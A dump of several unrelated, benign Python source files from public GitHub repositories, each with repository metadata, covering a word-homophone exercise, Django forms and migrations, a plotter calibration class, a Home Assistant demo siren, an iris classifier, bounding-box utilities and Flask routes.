petemulholland/learning | 6,124,623,391,290 | 112f405af7a6e4465ea54408f534eac8940593e4 | 82ffe7f53d2275e7baf858a0eebf69c42e4b1f8a | /Python/ThinkPython/Chapter11/homophones.py | 3a1715451ff00c597070976a76328c55186e3c8e | [] | no_license | https://github.com/petemulholland/learning | 325bf39cf2499880e471a99389e1fa0dada27bbf | f51185262b5ffbda4437324c6be52569d443d5b4 | refs/heads/master | "2020-04-10T22:48:33.418638" | "2017-08-26T13:45:31" | "2017-08-26T13:45:31" | 10,203,967 | 0 | 0 | null | false | "2017-02-28T10:41:59" | "2013-05-21T19:45:14" | "2016-02-23T16:09:11" | "2017-02-28T10:41:59" | 9,700 | 0 | 0 | 0 | C# | null | null | import pronounce
def read_words(filename='..\words.txt'):
    """Read the word list in *filename* and return the words as a lowercase
    list, one word per line.

    The original docstring claimed a dictionary was returned; a list is.
    *filename* defaults to the original hard-coded path so existing callers
    are unaffected.
    """
    # NOTE(review): the default path uses a backslash ('..\words.txt');
    # presumably this script was run on Windows -- confirm before changing.
    words = []
    with open(filename) as fin:  # `with` closes the handle (was leaked before)
        for line in fin:
            words.append(line.strip().lower())
    return words
def check_homophones(word, pron):
    # Print `word` plus its two one-letter-deletion variants when all three
    # share a pronunciation. `pron` maps word -> pronunciation (built by the
    # pronounce module). Words shorter than 4 letters are skipped.
    if len(word) < 4:
        return
    if word not in pron:
        return
    wpron = pron[word]
    # Variant 1: word with its first letter removed.
    hom1 = word[1:]
    if hom1 not in pron:
        return
    h1pron = pron[hom1]
    # Variant 2: word with its second letter removed.
    hom2 = word[0] + word[2:]
    if hom2 not in pron:
        return
    h2pron = pron[hom2]
    if wpron == h1pron and wpron == h2pron:
        # Python 2 print statement (this file predates Python 3).
        print word, hom1, hom2
def main():
    """Scan the word list for words that stay homophones after deleting
    their first or second letter."""
    word_list = read_words()
    pronunciations = pronounce.read_dictionary()
    for candidate in word_list:
        check_homophones(candidate, pronunciations)


if __name__ == '__main__':
    main()
chfoued/django | 2,748,779,106,578 | e8e500dd136b0d5c2c26fadad3e38df30cfae8da | 978b097f216fc1af3e6f5afc399102e393fde167 | /polls/forms.py | a1fd365cad21d7190fa653ac3ac7f103472214ec | [] | no_license | https://github.com/chfoued/django | afeb2ac96e583999b9a491304310080a217cba74 | 0935341ce3d9bddc8de7aadd77a9898a0d4d0021 | refs/heads/master | "2021-09-01T10:37:30.378477" | "2017-12-12T15:47:46" | "2017-12-12T15:47:46" | 112,955,333 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django import forms
from .models import Produit
class ProduitForm(forms.Form):
name = forms.CharField(max_length=200)
Poids = forms.FloatField()
nbr_carton = forms.IntegerField()
class OperationForm(forms.Form):
produit = forms.ModelChoiceField(queryset=Produit.objects.all())
poids = forms.FloatField()
nbr_carton = forms.IntegerField()
client = forms.CharField(max_length=200)
date = forms.DateField()
| UTF-8 | Python | false | false | 428 | py | 7 | forms.py | 4 | 0.75 | 0.735981 | 0 | 15 | 27 | 65 |
rottaca/VPlotter2.0 | 17,119,739,641,949 | ee07b8b4dc54e5e9d9d649a81699813811a0a45c | 2d18f6457e9a166035e6420869540bf679ecdd55 | /plotter/utils/calibration.py | ef51ae251650494d52726750e1d09121f81c493a | [] | no_license | https://github.com/rottaca/VPlotter2.0 | bb452aa870f1c8ef2f1586193d96e56a0063a92b | 57918dad191f8f0a23b9b561d252edf20eecf057 | refs/heads/master | "2020-03-19T16:22:26.165890" | "2019-06-22T17:51:37" | "2019-06-22T17:51:37" | 136,713,012 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
class Calibration:
"""
Calibration class for plotter.
All (x,y) coordinates have to be relative to the origin.
Absolute zero is at the upper left corner (left motor).
"""
def __init__(self, base, origin, stepsPerMM, resolution):
self.base = base
self.origin = origin
self.stepsPerMM = stepsPerMM
self.resolution = resolution
def __str__(self):
return """----------Calibration----------
Base: {}
Origin: {}
-------------------------------""".format(str(self.base), str(self.origin))
| UTF-8 | Python | false | false | 573 | py | 21 | calibration.py | 17 | 0.570681 | 0.570681 | 0 | 21 | 26.285714 | 75 |
jodhiambo/beelinev1 | 2,508,260,906,374 | 15fc62aeb17a6a0ee45f6ab36be7333e7842fe70 | 0a8bb114534eabdcf8d9a1d43462e374183cf6e7 | /userprofiles/migrations/0003_auto_20200806_2051.py | dc3768aa2c675e0eead9aa7b3adaa1de610afc23 | [] | no_license | https://github.com/jodhiambo/beelinev1 | 70a465ddf6e1f89493af07122496fd503d4d5d86 | d8af31cf1090c58fe52d6bec0f82ac49e69260df | refs/heads/main | "2023-06-23T09:05:47.386524" | "2021-07-21T12:51:00" | "2021-07-21T12:51:00" | 388,112,973 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 3.0.8 on 2020-08-06 17:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('userprofiles', '0002_auto_20200806_2041'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='age_group',
field=models.CharField(blank=True, choices=[('Below 18 Yrs', 'Below 18 Yrs'), ('18-35 Yrs', '18-35 Yrs'), ('Above 35 Yrs', 'Above 35 Yrs')], default='', max_length=50, null=True),
),
]
| UTF-8 | Python | false | false | 536 | py | 69 | 0003_auto_20200806_2051.py | 27 | 0.595149 | 0.503731 | 0 | 18 | 28.777778 | 191 |
NickAlger/helper_functions | 7,456,063,228,282 | b0386ded0f41eca9880cf0e4ba62947b471ef70a | 79c3df91736d433118557f69626ea1d313be06dc | /nalger_helper_functions/box_mesh_nd.py | 31d3a55fe940dcbec727ea0d2e44181d029399fb | [] | no_license | https://github.com/NickAlger/helper_functions | 221245324f01d7ef3e5b8b9dc134036d829fa2ae | ef51c1aecb010b169caeb9cd0efa20d9160c80fa | refs/heads/master | "2021-06-24T08:49:30.858690" | "2021-06-10T09:46:13" | "2021-06-10T09:46:13" | 212,186,032 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import dolfin as dl
def box_mesh_nd(box_min, box_max, grid_shape):
# Usage:
# https://github.com/NickAlger/nalger_helper_functions/blob/master/jupyter_notebooks/box_mesh_nd.ipynb
d = len(box_min)
if d == 1:
mesh = dl.IntervalMesh(grid_shape[0] - 1, box_min[0], box_max[0])
elif d == 2:
mesh = dl.RectangleMesh(dl.Point(box_min), dl.Point(box_max), grid_shape[0] - 1, grid_shape[1] - 1)
elif d == 3:
mesh = dl.BoxMesh(dl.Point(box_min), dl.Point(box_max), grid_shape[0] - 1, grid_shape[1] - 1, grid_shape[2] - 1)
else:
raise RuntimeError('grid_mesh only supports d=1,2,3')
return mesh | UTF-8 | Python | false | false | 670 | py | 114 | box_mesh_nd.py | 53 | 0.620896 | 0.591045 | 0 | 17 | 38.470588 | 120 |
home-assistant/core | 2,027,224,589,347 | 3ab286c2c36087656bd73278d9a91e5a49841f99 | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /homeassistant/components/demo/siren.py | 0720114861cfe373a438891105b0d52779901bf6 | [
"Apache-2.0"
] | permissive | https://github.com/home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | "2023-08-31T15:41:06.299469" | "2023-08-31T14:50:53" | "2023-08-31T14:50:53" | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | false | "2023-09-14T21:50:15" | "2013-09-17T07:29:48" | "2023-09-14T21:50:03" | "2023-09-14T21:50:15" | 470,852 | 62,888 | 24,675 | 2,641 | Python | false | false | """Demo platform that offers a fake siren device."""
from __future__ import annotations
from typing import Any
from homeassistant.components.siren import SirenEntity, SirenEntityFeature
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
SUPPORT_FLAGS = SirenEntityFeature.TURN_OFF | SirenEntityFeature.TURN_ON
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the Demo siren devices."""
async_add_entities(
[
DemoSiren(name="Siren"),
DemoSiren(
name="Siren with all features",
available_tones=["fire", "alarm"],
support_volume_set=True,
support_duration=True,
),
]
)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the Demo siren devices config entry."""
await async_setup_platform(hass, {}, async_add_entities)
class DemoSiren(SirenEntity):
"""Representation of a demo siren device."""
def __init__(
self,
name: str,
available_tones: list[str | int] | None = None,
support_volume_set: bool = False,
support_duration: bool = False,
is_on: bool = True,
) -> None:
"""Initialize the siren device."""
self._attr_name = name
self._attr_should_poll = False
self._attr_supported_features = SUPPORT_FLAGS
self._attr_is_on = is_on
if available_tones is not None:
self._attr_supported_features |= SirenEntityFeature.TONES
if support_volume_set:
self._attr_supported_features |= SirenEntityFeature.VOLUME_SET
if support_duration:
self._attr_supported_features |= SirenEntityFeature.DURATION
self._attr_available_tones = available_tones
async def async_turn_on(self, **kwargs: Any) -> None:
"""Turn the siren on."""
self._attr_is_on = True
self.async_write_ha_state()
async def async_turn_off(self, **kwargs: Any) -> None:
"""Turn the siren off."""
self._attr_is_on = False
self.async_write_ha_state()
| UTF-8 | Python | false | false | 2,504 | py | 11,073 | siren.py | 9,921 | 0.640974 | 0.640974 | 0 | 76 | 31.947368 | 74 |
victorfbrito/pythonbasics | 3,779,571,250,017 | f6f6cc37173102c47bce9daee5646c24347279b7 | d60ea46b094b5758a9050697916d3b90891619e9 | /Calculadora.py | 0d35da0075b9d1051bf355645dc0077ad8966c1f | [] | no_license | https://github.com/victorfbrito/pythonbasics | 17943dce426bfe8afdca7bf9ede6e7c13602f7da | 42ea2dcba83ab93a0aeed6dca3b53155584a2f7e | refs/heads/master | "2022-12-12T03:54:14.488214" | "2020-08-26T14:10:31" | "2020-08-26T14:10:31" | 290,514,281 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Criando uma classe/ Subtipo de OBJECT: HERDA TODAS AS CARACTERÍSTICAS DE OBJECT
class Calculadora(object):
    """Two-operand calculator holding a pair of values and summing them."""

    def __init__(self, a, b):
        # Delegate to definevalores so the assignment logic lives in one place.
        self.definevalores(a, b)

    def definevalores(self, a, b):
        """Store (or replace) the two operands."""
        self.a = a
        self.b = b

    def soma(self):
        """Return the sum of the stored operands."""
        return self.a + self.b
| UTF-8 | Python | false | false | 305 | py | 11 | Calculadora.py | 10 | 0.572368 | 0.572368 | 0 | 15 | 19.2 | 81 |
JovanDel/August | 128,849,053,028 | 2a278683f487635558c462709ee3f869bd5e0722 | 96543443202bb30332f97007d8d0a027356b813d | /myfile.py | 6c1056aa9219e651a23df08d89464831838e3848 | [] | no_license | https://github.com/JovanDel/August | 4451a7bbb7d67f365eb26bce06d39c57d81a1ffd | 0f65f21c23e8e7e597b5406074652b9117264630 | refs/heads/master | "2022-12-10T02:40:06.973909" | "2020-09-02T07:47:23" | "2020-09-02T07:47:23" | 292,213,881 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | text_file = open("family.txt", "w")
n = text_file.write('Welcome to pythonexamples.org')  # write() returns the character count
text_file.close()
# BUG(review): `myFile` is undefined (the handle above is `text_file`) and the
# string literal below is unterminated -- this trailing line is broken as committed.
myFile.write("Mark
| UTF-8 | Python | false | false | 130 | py | 43 | myfile.py | 23 | 0.692308 | 0.692308 | 0 | 4 | 30.5 | 52 |
AchillesJJ/RL_spin1 | 3,204,045,634,185 | 6602b73dabc3446ffb8619cb405dc9ef07544223 | 053ff1d3f7c92162536602a3d5a260800c7b0404 | /DDPG_python3/spin1_ED.py | 08c5c0b04fa8768e34fb8a68eb445993bdce7410 | [] | no_license | https://github.com/AchillesJJ/RL_spin1 | 56ce9874810029fc648b3f41bf6d5377d50326b7 | 548c892a0b8d4471e97a4e5fefff29672ccd3b3c | refs/heads/master | "2021-09-19T07:28:33.892172" | "2018-07-25T03:20:58" | "2018-07-25T03:20:58" | 111,948,400 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # encoding: utf-8
import time
import os
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
from scipy import linalg
from scipy.integrate import odeint
from scipy.integrate import ode
import math
import cPickle
import cmath
# Hamiltonian of spin-1 system
def Hamiltonian(q, c2, Nt):
"""
This functions generate the Hamiltonian of spin-1 system
q: quadratic Zeeman shift
c2: interaction strength of spin exchange
Nt: total partical number
"""
dim = int(Nt/2)+1
Htot = np.zeros((dim, dim), dtype = np.float64)
# diagonal part
for m in range(dim):
Htot[m, m] = (c2/(2.0*Nt))*(2.0*(Nt-2.0*m)-1)*(2.0*m)-q*(Nt-2.0*m)
# spin-exchange part
for m in range(dim-1):
Htot[m, m+1] = (c2/Nt)*(m+1)*math.sqrt(Nt-2*m-1)*math.sqrt(Nt-2*m)
Htot[m+1, m] = Htot[m, m+1]
return Htot
# normalization of wave function
def normalize(psi):
norm = math.sqrt(np.sum(abs(psi)**2))
return psi/norm
# one-step time evolution matrix
def unitary_op(q, c2, Nt, dt, psi):
"""
This function generate the evolution matrix with
q: quadratic Zeeman shift
c2: interaction strength of spin exchange
Nt: total partical number
dt: evolution time interval
"""
H = Hamiltonian(q[0][0], c2, Nt)
op = sp.linalg.expm2(-complex(0.0, 1.0)*dt*H)
psi_f = op.dot(psi)
return normalize(psi_f)
# if __name__ == '__main__':
# psi = np.zeros((2,), dtype=np.complex64)
# psi[0] = 1.0
# psi2 = unitary_op([[-0.25]], -1.0, 2, 0.5, psi)
# print(abs(psi2[-1])**2, util.state(psi2))
| UTF-8 | Python | false | false | 1,624 | py | 22 | spin1_ED.py | 10 | 0.614532 | 0.577586 | 0 | 58 | 26.482759 | 74 |
EthanJamesLew/PSU_STAT671 | 13,030,930,778,016 | 34b1553a8b0e5edd67fc50293f7d073e81714b9d | 636359cf640b72d8086a08454ef2343cdf9e5b0b | /hw/01/simple_classifier/iris.py | 4563640da1b4b906ff0598beb847c982bb70ff0c | [] | no_license | https://github.com/EthanJamesLew/PSU_STAT671 | 679e05a0b98dd7eecab14d2791b0d678f722f7c5 | b378ed71be3db5d7d24f6f583ec9e4633048f718 | refs/heads/master | "2020-08-04T18:33:00.241658" | "2019-12-12T01:26:16" | "2019-12-12T01:26:16" | 212,237,716 | 0 | 0 | null | false | "2019-12-12T01:26:17" | "2019-10-02T02:10:37" | "2019-12-05T07:13:22" | "2019-12-12T01:26:17" | 3,707 | 0 | 0 | 0 | Jupyter Notebook | false | false | '''Iris
@author: Ethan Lew
'''
from sklearn.datasets import load_iris
import pandas as pd
import numpy as np
from classifier import PartitionData, SimpleClassifier, risk
def load_iris_data(s0, s1, ratio):
# Get Iris Data
iris_sk = load_iris()
species_lp = {'I. setosa': 0, 'I. versicolor': 1, 'I. virginica': 2}
iris_df = {'sepal_length': iris_sk['data'][:, 0], 'sepal_width': iris_sk['data'][:, 1],
'petal_length': iris_sk['data'][:, 2],
'petal_width': iris_sk['data'][:, 3], 'species': iris_sk['target']}
iris_df = pd.DataFrame(data=iris_df)
iris_df = iris_df.loc[(iris_df['species'] == species_lp[s0]) | (iris_df['species'] == species_lp[s1])]
# Load as R^4 observations and map labels to binary values
X = np.array(iris_df)[:, :-1]
Y = np.array(iris_df)[:, -1]
unique = set(np.array(Y, dtype=np.int))
Y[Y == min(unique)] = -1
Y[Y == max(unique)] = 1
# Partition the data
iris_data = PartitionData()
iris_data.add_data(X, Y)
iris_data.partition(ratio)
# Return data object and map to species name
indices_lp = {species_lp[k] : k for k in species_lp}
return iris_data, {1: indices_lp[max(unique)], -1: indices_lp[min(unique)]}
def classify_species(s0, s1, ratio):
sc = SimpleClassifier()
iris, names = load_iris_data(s0, s1, ratio)
sc.add_data(*iris.training)
sc.train()
valr = np.array([sc.classify(x) for x in iris.training[0]])
val = np.array([sc.classify(x) for x in iris.validation[0]])
return risk(valr, iris.training[1]), risk(val, iris.validation[1])
def problem_1():
risk1, error1 = classify_species('I. setosa', 'I. versicolor', 0.8)
risk2, error2 = classify_species('I. virginica', 'I. versicolor', 0.8)
risk3, error3 = classify_species('I. virginica', 'I. setosa', 0.8)
print('Empirical Risk of I. Setosa, I. Versicolor: ', risk1)
print('Empirical Risk of I. Virginica, I. Versicolor: ', risk2)
print('Empirical Risk of I. Virginica, I. Setosa: ', risk3)
print('Classification Error of I. Setosa and I. Versicolor: ', error1)
print('Classification Error of I. Virginica and I. Versicolor: ', error2)
print('Classification Error of I. Virginica and I. Setosa: ', error3)
def scatter():
import matplotlib.pyplot as plt
import matplotlib.font_manager
from mpl_toolkits.mplot3d import Axes3D
from sklearn import datasets
from sklearn.decomposition import PCA
from matplotlib import rc
rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']})
rc('text', usetex=True)
iris = datasets.load_iris()
X = iris.data[:, :2] # we only take the first two features.
y = iris.target
x_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5
y_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5
plt.figure(2, figsize=(8 / 1.5, 6 / 1.5))
plt.clf()
# Plot the training points
plt.scatter(X[y == 0, 0], X[y == 0, 1], c='r', cmap=plt.cm.Set1,
edgecolor='k')
plt.scatter(X[y == 1, 0], X[y == 1, 1], c='g', cmap=plt.cm.Set1,
edgecolor='k')
plt.scatter(X[y == 2, 0], X[y == 2, 1], c='b', cmap=plt.cm.Set1,
edgecolor='k')
plt.xlabel('Sepal Length (cm)')
plt.ylabel('Sepal Width (cm)')
plt.legend(["I. Setosa", "I. Versicolor", "I. Virginica"])
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(())
plt.yticks(())
fig = plt.figure(1, figsize=(8, 6))
ax = Axes3D(fig, elev=-150, azim=110)
X_reduced = PCA(n_components=3).fit_transform(iris.data)
ax.scatter(X_reduced[:, 0], X_reduced[:, 1], X_reduced[:, 2], c=y,
cmap=plt.cm.Set1, edgecolor='k', s=40)
ax.set_title("First three PCA directions")
ax.set_xlabel("1st eigenvector")
ax.w_xaxis.set_ticklabels([])
ax.set_ylabel("2nd eigenvector")
ax.w_yaxis.set_ticklabels([])
ax.set_zlabel("3rd eigenvector")
ax.w_zaxis.set_ticklabels([])
plt.show()
if __name__ == "__main__":
problem_1() | UTF-8 | Python | false | false | 4,044 | py | 38 | iris.py | 17 | 0.600396 | 0.575915 | 0 | 111 | 35.441441 | 106 |
HeDefine/LeetCodePractice | 10,617,159,192,799 | 2318d9060b710e6c1c532549d12ecc8569a4446e | 5855918d1e253b8cdbabbf80137d06d2750963b0 | /Q1252.奇数值单元格的数目.py | 42db16acd6097c0b4572569d1627f3a9537fa10e | [] | no_license | https://github.com/HeDefine/LeetCodePractice | f6b163984e83370e44febae93b0a9cf34813a331 | 331c562d6618b5a95a17c4ae108f0e0442bd0dd6 | refs/heads/master | "2022-09-22T14:57:21.499849" | "2022-09-20T06:46:22" | "2022-09-20T06:46:22" | 195,788,878 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 给你一个 m x n 的矩阵,最开始的时候,每个单元格中的值都是 0。
# 另有一个二维索引数组 indices,indices[i] = [ri, ci] 指向矩阵中的某个位置,其中 ri 和 ci 分别表示指定的行和列(从 0 开始编号)。
# 对 indices[i] 所指向的每个位置,应同时执行下述增量操作:
# ri 行上的所有单元格,加 1 。
# ci 列上的所有单元格,加 1 。
# 给你 m、n 和 indices 。请你在执行完所有 indices 指定的增量操作后,返回矩阵中 奇数值单元格 的数目。
#
# 示例 1:
# 输入:m = 2, n = 3, indices = [[0,1],[1,1]]
# 输出:6
# 解释:最开始的矩阵是 [[0,0,0],[0,0,0]]。
# 第一次增量操作后得到 [[1,2,1],[0,1,0]]。
# 最后的矩阵是 [[1,3,1],[1,3,1]],里面有 6 个奇数。
#
# 示例 2:
# 输入:m = 2, n = 2, indices = [[1,1],[0,0]]
# 输出:0
# 解释:最后的矩阵是 [[2,2],[2,2]],里面没有奇数。
#
# 提示:
# 1 <= m, n <= 50
# 1 <= indices.length <= 100
# 0 <= ri < m
# 0 <= ci < n
class Solution:
def oddCells(self, m: int, n: int, indices: list) -> int:
row_list = [0] * m
col_list = [0] * n
for pos in indices:
x, y = pos[0], pos[1]
row_list[x] += 1
col_list[y] += 1
res = 0
for row in row_list:
for col in col_list:
if (row + col) % 2 == 1:
res += 1
return res
print (Solution().oddCells(2, 3, [[0,1],[1,1]])) # 6
print(Solution().oddCells(2, 2, [[1,1],[0,0]])) # 0 | UTF-8 | Python | false | false | 1,602 | py | 581 | Q1252.奇数值单元格的数目.py | 579 | 0.48738 | 0.421236 | 0 | 42 | 26.380952 | 86 |
LCOGT/banzai-nres | 12,180,527,279,666 | edee1001f1e1893333dded7351b499f7c033641a | 68b53b55647fa64d4a74230a2bcf8025f1839a6f | /banzai_nres/tests/test_gc_distance.py | 624430d98b5f5003e2b5d90cfb767f5adc88ecfd | [] | no_license | https://github.com/LCOGT/banzai-nres | 04e75ae1c3c2bb86d0173a5ffe47462ef444ede6 | 5533ad0f60b96111aceec7b1661d260692f6f43d | refs/heads/main | "2023-08-30T22:36:07.639127" | "2023-07-25T20:31:02" | "2023-07-25T20:31:02" | 140,865,515 | 2 | 2 | null | false | "2023-08-23T16:12:48" | "2018-07-13T15:44:06" | "2022-12-08T01:05:32" | "2023-08-23T16:12:48" | 21,576 | 3 | 1 | 9 | Python | false | false | from banzai_nres.dbs import cos_great_circle_distance
from astropy.coordinates import SkyCoord
from astropy import units
import numpy as np
def test_gc_distance():
ra1, dec1 = 150.0, 25.0
ra2, dec2 = 100.0, 10.0
coord1 = SkyCoord(ra1, dec1, unit=(units.deg, units.deg))
coord2 = SkyCoord(ra2, dec2, unit=(units.deg, units.deg))
expected = np.cos(np.deg2rad(coord1.separation(coord2).deg))
actual = cos_great_circle_distance(np.sin(np.deg2rad(ra1)), np.cos(np.deg2rad(ra1)),
np.sin(np.deg2rad(dec1)), np.cos(np.deg2rad(dec1)),
np.sin(np.deg2rad(ra2)), np.cos(np.deg2rad(ra2)),
np.sin(np.deg2rad(dec2)), np.cos(np.deg2rad(dec2)))
np.testing.assert_allclose(actual, expected)
| UTF-8 | Python | false | false | 821 | py | 77 | test_gc_distance.py | 50 | 0.605359 | 0.552984 | 0 | 18 | 44.611111 | 90 |
veronM/svgis | 6,004,364,330,207 | fe32b5a36e82db405653bd123dcfbbf03dd67370 | 656345432c7f242da3e259f9e47b7810317a99bd | /src/svgis/bounding.py | ff56082500abd8c031bb599593ff6a548ac7c5ed | [] | no_license | https://github.com/veronM/svgis | 3faa49ab188642bdb18b5413db9d6176e0ff706c | 1b3fb8617a0c124c393de5df9a6e1f3f060ccc91 | refs/heads/master | "2022-12-25T08:54:44.192586" | "2020-10-04T18:41:23" | "2020-10-04T18:41:23" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''Utilities for working with bounding boxes'''
# This file is part of svgis.
# https://github.com/fitnr/svgis
# Licensed under the GNU General Public License v3 (GPLv3) license:
# http://opensource.org/licenses/GPL-3.0
# Copyright (c) 2015-16, 2020, Neil Freeman <contact@fakeisthenewreal.org>
from pyproj.transformer import Transformer
from . import errors, utils
def check(bounds):
'''Check if bounds are valid.'''
# Refuse to set these more than once
try:
if bounds is None or len(bounds) != 4 or not all(bounds):
return False
except (TypeError, AttributeError, ValueError):
return False
if bounds[0] > bounds[2]:
bounds = bounds[2], bounds[1], bounds[0], bounds[3]
if bounds[1] > bounds[3]:
bounds = bounds[0], bounds[3], bounds[2], bounds[1]
return bounds
def update(old, new):
"""
Extend old with any more distant values from newpoints.
Also replace any missing min/max points in old with values from new.
"""
bounds = []
inf = float('inf')
neginf = inf * -1
# python3 gives TypeError when using None in min/max
# This contraption avoids that problem.
# List comp below replaces Nones in bounds with real values in new or old
for n, m in zip(new[:2], old[:2]):
try:
if neginf in (m, n):
bounds.append(max(n, m))
continue
bounds.append(min(n, m))
except TypeError:
bounds.append(None)
for n, m in zip(new[2:], old[2:]):
try:
if inf in (m, n):
bounds.append(min(n, m))
continue
bounds.append(max(n, m))
except TypeError:
bounds.append(None)
if any(not v for v in bounds):
bounds = list((a or b or c) for a, b, c in zip(bounds, new, old))
return bounds
def pad(bounds, ext=100):
"""
Pad a bounding box. Works best when input is in feet or meters or something.
"""
try:
return bounds[0] - ext, bounds[1] - ext, bounds[2] + ext, bounds[3] + ext
except TypeError:
return bounds
def ring(bounds):
'''Convert min, max points to a boundary ring.'''
minx, miny, maxx, maxy = bounds
xs, ys = list(utils.between(minx, maxx)), list(utils.between(miny, maxy))
left_top = [(minx, y) for y in ys] + [(x, maxy) for x in xs][1:]
ys.reverse()
xs.reverse()
return left_top + [(maxx, y) for y in ys] + [(x, miny) for x in xs]
def covers(b1, b2):
"""
Check if a bounding box covers another. Returns ``False`` if any
points in ``b2`` are outside ``b1`.
Args:
b1 (tuple): A bounding box (minx, miny, maxx, maxy)
b2 (tuple): A bounding box
Returns:
``bool``
"""
return b1[0] <= b2[0] and b1[1] <= b2[1] and b1[2] >= b2[2] and b1[3] >= b2[3]
def transform(bounds, **kwargs):
"""
Project a bounding box, taking care to not slice off the sides.
Args:
bounds (tuple): bounding box to transform.
transformer (pyproj.transformer.Transformer): A pyproj Transformer instance.
in_crs (dict): Fiona-type proj4 mapping representing input projection.
out_crs (dict): Fiona-type proj4 mapping representing output projection.
Returns:
``tuple``
"""
transformer = kwargs.get('transformer')
in_crs = kwargs.get('in_crs')
out_crs = kwargs.get('out_crs')
if not transformer and not (in_crs and out_crs):
raise errors.SvgisError('Need input CRS and output CRS or a Transformer')
if transformer is None:
transformer = Transformer.from_crs(in_crs, out_crs, skip_equivalent=True, always_xy=True)
densebounds = ring(bounds)
xbounds, ybounds = list(zip(*transformer.itransform(densebounds)))
return min(xbounds), min(ybounds), max(xbounds), max(ybounds)
| UTF-8 | Python | false | false | 3,921 | py | 36 | bounding.py | 29 | 0.606478 | 0.589645 | 0 | 136 | 27.830882 | 97 |
zwerg44/python-engineio | 12,610,023,988,742 | 99aaf9098e8ff089bbc0bc273ded3cfd10d95fd8 | 54d2b57e4946f8854814994db2eea2add72bc1f4 | /engineio/__init__.py | a28690acaac1ef19c0e19ef702be3efb2ec20649 | [
"MIT"
] | permissive | https://github.com/zwerg44/python-engineio | 8f495e0d312b528f81e198b69c154413f794b762 | 849a5578998f8e04750bd4796f605f460fe95059 | refs/heads/master | "2020-04-08T16:22:08.976059" | "2018-12-02T22:48:28" | "2018-12-02T22:48:28" | 159,515,374 | 0 | 0 | null | true | "2018-11-28T14:33:46" | "2018-11-28T14:33:45" | "2018-11-25T11:37:07" | "2018-11-25T15:24:39" | 532 | 0 | 0 | 0 | null | false | null | import sys
from .middleware import WSGIApp, Middleware
from .server import Server
if sys.version_info >= (3, 5): # pragma: no cover
from .asyncio_server import AsyncServer
from .async_tornado import get_tornado_handler
from .async_asgi import ASGIApp
else: # pragma: no cover
AsyncServer = None
__version__ = '2.3.2'
__all__ = ['__version__', 'Server', 'WSGIApp', 'Middleware']
if AsyncServer is not None: # pragma: no cover
__all__ += ['AsyncServer', 'ASGIApp', 'get_tornado_handler']
| UTF-8 | Python | false | false | 512 | py | 4 | __init__.py | 3 | 0.675781 | 0.666016 | 0 | 16 | 31 | 64 |
nehuenpereyra/Sistema-Gestion-Centros-de-Ayuda-y-Turnos | 8,907,762,215,369 | d797efd545aca41b9fee5bd1ee9d15c887afbba0 | cf4e542356c0739c49b16c31260228622f433359 | /config/routes/help_center.py | a38b28ed4fef8823022698e7bd98fe75a339ec79 | [] | no_license | https://github.com/nehuenpereyra/Sistema-Gestion-Centros-de-Ayuda-y-Turnos | cb3d2b27c10840726fbd39aedcc77ab10018bf32 | 1295d498498743afe45e814955d478e3b54c47dc | refs/heads/main | "2023-08-05T18:40:57.916437" | "2021-09-17T11:45:32" | "2021-09-17T11:45:32" | 407,519,229 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from app.resources import help_center
import app.resources.api.help_center as api_help_center
def set_routes(app):
app.add_url_rule("/centros", "help_center_index", help_center.index)
app.add_url_rule("/centro/ver/<int:id>",
"help_center_show", help_center.show)
app.add_url_rule("/centro/nuevo", "help_center_new", help_center.new)
app.add_url_rule("/centro/crear", "help_center_create",
help_center.create, methods=["POST"])
app.add_url_rule("/centro/editar/<int:id>",
"help_center_edit", help_center.edit)
app.add_url_rule("/centro/actualizar/<int:id>",
"help_center_update", help_center.update, methods=["POST"])
app.add_url_rule("/centro/borrar/<int:id>",
"help_center_delete", help_center.delete)
app.add_url_rule("/centro/aceptar/<int:id>",
"help_center_accept", help_center.certify, defaults={"is_accepted": True})
app.add_url_rule("/centro/rechazar/<int:id>",
"help_center_reject", help_center.certify, defaults={"is_accepted": False})
app.add_url_rule("/api/centros", "api_help_center_index",
api_help_center.index)
app.add_url_rule("/api/centro/<int:id>",
"api_help_center_show", api_help_center.show)
app.add_url_rule("/api/centro", "api_help_center_create",
api_help_center.create, methods=["POST"])
app.add_url_rule("/api/centros/mas_turnos", "api_help_center_more_turns",
api_help_center.more_turns)
| UTF-8 | Python | false | false | 1,603 | py | 103 | help_center.py | 68 | 0.59451 | 0.59451 | 0 | 31 | 50.677419 | 96 |
